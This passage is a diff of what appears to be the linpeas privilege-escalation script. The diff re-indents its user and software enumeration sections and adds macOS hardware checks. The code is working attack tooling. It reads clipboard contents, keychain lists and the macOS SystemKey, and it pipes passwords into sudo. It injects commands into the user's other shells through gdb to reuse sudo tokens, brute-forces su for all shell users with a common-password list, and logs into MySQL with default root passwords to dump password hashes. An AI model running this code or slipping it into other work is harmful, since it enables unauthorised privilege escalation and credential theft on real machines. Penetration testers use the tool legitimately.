echo "" - - print_2title "Keychains" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker" - security list-keychains - echo "" - - print_2title "SystemKey" - ls -l /var/db/SystemKey - if [ -r "/var/db/SystemKey" ]; then - echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; - fi - echo "" - fi - - #-- UI) PGP keys? - print_2title "Do I have PGP keys?" - command -v gpg 2>/dev/null || echo_not_found "gpg" - gpg --list-keys 2>/dev/null - command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" - netpgpkeys --list-keys 2>/dev/null - command -v netpgp 2>/dev/null || echo_not_found "netpgp" + print_2title "Bluetooth Info" + warn_exec system_profiler SPBluetoothDataType echo "" - #-- UI) Clipboard and highlighted text - print_2title "Clipboard or highlighted text?" - if [ "$(command -v xclip 2>/dev/null)" ]; then - echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - elif [ "$(command -v xsel 2>/dev/null)" ]; then - echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - elif [ "$(command -v pbpaste 2>/dev/null)" ]; then - echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - else echo_not_found "xsel and xclip" - fi + print_2title "Ethernet Info" + warn_exec system_profiler SPEthernetDataType echo "" - #-- UI) Sudo -l - print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - (echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" - if [ "$PASSWORD" ]; then - (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" + print_2title "USB Info" + warn_exec system_profiler SPUSBDataType + echo "" +fi +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi + +if echo $CHECKS | grep -q users_information; +print_title "Users Information" +########################################### +#----------) Users Information (----------# +########################################### +print_title "Users Information" + +#-- UI) My user +print_2title "My user" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" +(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" +echo "" + +if [ "$MACPEAS" ];then + print_2title "Current user Login and Logout hooks" + defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + echo "" + + print_2title "All Login and Logout hooks" + defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist + echo "" + + print_2title "Keychains" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker" + security list-keychains + echo "" + + print_2title "SystemKey" + ls -l /var/db/SystemKey + if [ -r "/var/db/SystemKey" ]; then + echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - ( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" - if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then - echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," + echo "" +fi + +#-- UI) PGP keys? +print_2title "Do I have PGP keys?" +command -v gpg 2>/dev/null || echo_not_found "gpg" +gpg --list-keys 2>/dev/null +command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" +netpgpkeys --list-keys 2>/dev/null +command -v netpgp 2>/dev/null || echo_not_found "netpgp" +echo "" + +#-- UI) Clipboard and highlighted text +print_2title "Clipboard or highlighted text?" +if [ "$(command -v xclip 2>/dev/null)" ]; then + echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," +elif [ "$(command -v xsel 2>/dev/null)" ]; then + echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," +elif [ "$(command -v pbpaste 2>/dev/null)" ]; then + echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED}," +else echo_not_found "xsel and xclip" +fi +echo "" + +#-- UI) Sudo -l +print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +(echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" +if [ "$PASSWORD" ]; then + (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" +fi +( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" +if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then + echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," +fi +for filename in '/etc/sudoers.d/*'; do + if [ -r "$filename" ]; then + echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" + grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," fi - for filename in '/etc/sudoers.d/*'; do - if [ -r "$filename" ]; then - echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" - grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," +done +echo "" + +#-- UI) Sudo tokens +print_2title "Checking sudo tokens" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" +ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" +if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; +else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; +fi +is_gdb="$(command -v gdb 2>/dev/null)" +if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; +else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; +fi +if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then + echo "Checking for sudo tokens in other shells owned by current user" + for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do + echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) + echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 + if [ -f "/tmp/shrndom32r2r" ]; then + echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + break fi done - echo "" + if [ -f "/tmp/shrndom32r2r" ]; then + rm -f /tmp/shrndom32r2r 2>/dev/null + else echo "The escalation didn't work... (try again later?)" + fi +fi +echo "" - #-- UI) Sudo tokens - print_2title "Checking sudo tokens" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" - ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" - if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; - else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; - fi - is_gdb="$(command -v gdb 2>/dev/null)" - if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; - else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; - fi - if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then - echo "Checking for sudo tokens in other shells owned by current user" - for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do - echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) - echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 - if [ -f "/tmp/shrndom32r2r" ]; then - echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - break - fi - done - if [ -f "/tmp/shrndom32r2r" ]; then - rm -f /tmp/shrndom32r2r 2>/dev/null - else echo "The escalation didn't work... (try again later?)" +#-- UI) Doas +print_2title "Checking doas.conf" +doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null) +if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then + cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," +else echo_not_found "doas.conf" +fi +echo "" + +#-- UI) Pkexec policy +print_2title "Checking Pkexec policy" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" +(cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" +echo "" + +#-- UI) Superusers +print_2title "Superusers" +awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," +echo "" + +#-- UI) Users with console +print_2title "Users with console" +if [ "$MACPEAS" ]; then + dscl . list /Users | while read uname; do + ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + echo "" fi - fi - echo "" - - #-- UI) Doas - print_2title "Checking doas.conf" - doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null) - if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then - cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," - else echo_not_found "doas.conf" - fi - echo "" - - #-- UI) Pkexec policy - print_2title "Checking Pkexec policy" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" - (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" - echo "" - - #-- UI) Superusers - print_2title "Superusers" - awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Users with console - print_2title "Users with console" - if [ "$MACPEAS" ]; then - dscl . list /Users | while read uname; do - ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) - if grep -q "$ushell" /etc/shells; then #Shell user - dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - fi - done - else - no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) - unexpected_shells="" - printf "%s\n" "$no_shells" | while read f; do - if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then - unexpected_shells="$f\n$unexpected_shells" - fi - done - grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - if [ "$unexpected_shells" ]; then - printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" - echo "Unexpected users with shells:" - printf "%s\n" "$unexpected_shells" | while read f; do - if [ "$f" ]; then - grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" - fi - done + done +else + no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) + unexpected_shells="" + printf "%s\n" "$no_shells" | while read f; do + if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then + unexpected_shells="$f\n$unexpected_shells" fi - fi - echo "" - - #-- UI) All users & groups - print_2title "All users & groups" - if [ "$MACPEAS" ]; then - dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" - else - cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" - fi - echo "" - - #-- UI) Login now - print_2title "Login now" - (w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Last logons - print_2title "Last logons" - (last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Login info - print_2title "Last time logon each user" - lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - - EXISTS_FINGER="$(command -v finger 2>/dev/null)" - if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then - dscl . list /Users | while read uname; do - ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) - if grep -q "$ushell" /etc/shells; then #Shell user - finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" + done + grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + if [ "$unexpected_shells" ]; then + printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" + echo "Unexpected users with shells:" + printf "%s\n" "$unexpected_shells" | while read f; do + if [ "$f" ]; then + grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" fi done fi - echo "" +fi +echo "" - #-- UI) Password policy - print_2title "Password policy" - grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" - echo "" +#-- UI) All users & groups +print_2title "All users & groups" +if [ "$MACPEAS" ]; then + dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" +else + cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" +fi +echo "" - if [ "$MACPEAS" ]; then - print_2title "Relevant last user info and user configs" - defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null - echo "" +#-- UI) Login now +print_2title "Login now" +(w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," +echo "" - print_2title "Guest user status" - sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - echo "" - fi +#-- UI) Last logons +print_2title "Last logons" +(last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," +echo "" - #-- UI) Brute su - EXISTS_SUDO="$(command -v sudo 2>/dev/null)" - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then - print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC - POSSIBE_SU_BRUTE=$(check_if_su_brute); - if [ "$POSSIBE_SU_BRUTE" ]; then - SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1) - printf "%s\n" "$SHELLUSERS" | while read u; do - echo " Bruteforcing user $u..." - su_brute_user_num "$u" $PASSTRY - done - else - printf $GREEN"It's not possible to brute-force su.\n\n"$NC +#-- UI) Login info +print_2title "Last time logon each user" +lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + +EXISTS_FINGER="$(command -v finger 2>/dev/null)" +if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then + dscl . list /Users | while read uname; do + ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + echo "" fi - else - print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC - fi - print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC + done +fi +echo "" + +#-- UI) Password policy +print_2title "Password policy" +grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Relevant last user info and user configs" + defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null echo "" + + print_2title "Guest user status" + sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," + sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi - -if echo $CHECKS | grep -q SofI; then - ########################################### - #--------) Software Information (---------# - ########################################### - print_title "Software Information" - - #-- SI) Mysql version - print_2title "MySQL version" - mysql --version 2>/dev/null || echo_not_found "mysql" - echo "" - - #-- SI) Mysql connection root/root - print_list "MySQL connection using default root/root ........... " - mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null) - if [ "$mysqlconnect" ]; then - echo "Yes" | sed -${E} "s,.*,${SED_RED}," - mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no +#-- UI) Brute su +EXISTS_SUDO="$(command -v sudo 2>/dev/null)" +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then + print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC + POSSIBE_SU_BRUTE=$(check_if_su_brute); + if [ "$POSSIBE_SU_BRUTE" ]; then + SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1) + printf "%s\n" "$SHELLUSERS" | while read u; do + echo " Bruteforcing user $u..." + su_brute_user_num "$u" $PASSTRY + done + else + printf $GREEN"It's not possible to brute-force su.\n\n"$NC fi +else + print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC +fi +print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi - #-- SI) Mysql connection root/toor - print_list "MySQL connection using root/toor ................... " - mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null) - if [ "$mysqlconnect" ]; then - echo "Yes" | sed -${E} "s,.*,${SED_RED}," - mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi +if echo $CHECKS | grep -q software_information; +print_title "Software Information" +########################################### +#--------) Software Information (---------# +########################################### - #-- SI) Mysql connection root/NOPASS - mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null) - print_list "MySQL connection using root/NOPASS ................. " - if [ "$mysqlconnectnopass" ]; then - echo "Yes" | sed -${E} "s,.*,${SED_RED}," - mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi +#-- SI) Mysql version +print_2title "MySQL version" +mysql --version 2>/dev/null || echo_not_found "mysql" +echo "" - #-- SI) Mysql credentials - print_2title "Searching mysql credentials and exec" - if [ "$PSTORAGE_MYSQL" ]; then - printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do - for f in $(find $d -name debian.cnf 2>/dev/null); do - if [ -r "$f" ]; then - echo "We can read the mysql debian.cnf. You can use this username/password to log in 